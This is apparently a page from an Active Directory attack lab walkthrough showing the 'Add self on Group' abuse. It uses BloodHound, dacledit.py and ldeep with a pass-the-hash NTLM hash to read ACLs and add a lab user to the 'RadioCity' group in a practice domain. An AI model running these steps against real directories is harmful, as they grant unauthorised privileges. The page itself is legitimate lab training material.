Add self on Group (Nicolas-> RadioCity)

Let's Check in Bloodhound

sudo /usr/bin/./neo4j console
sudo /opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound  --no-sandbox --disable-dev-shm-usag

Let's check with dacledit

add 32 0'x infront of the hash to authenticate

dacledit.py -action 'read' -principal nicolas.maduro -target 'radiocity' 'NewYork.local'/'nicolas.maduro' -hashes 00000000000000000000000000000000:b3b3717f7d51b37fb325f7e7d048e998

We now got Nicolas so we can add us into the Radio City group
First find the distinguished name

ldeep ldap -u nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d newyork.local -s ldap://192.168.56.10 search '(sAMAccountName=Nicolas.Maduro)' distinguishedName
ldeep ldap -u nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d newyork.local -s ldap://192.168.56.10 search '(sAMAccountName=RadioCity)' distinguishedName

Add Nicolas.Maduro to RadioCity

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=RadioCity,OU=WestSide,DC=NewYork,DC=local"

See the result

ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'RadioCity'

PreviousWriteDacl on User (Ramon-> Nicolas)NextAddMember on Group (RadioCity -> EmpireState)

Last updated 2 years ago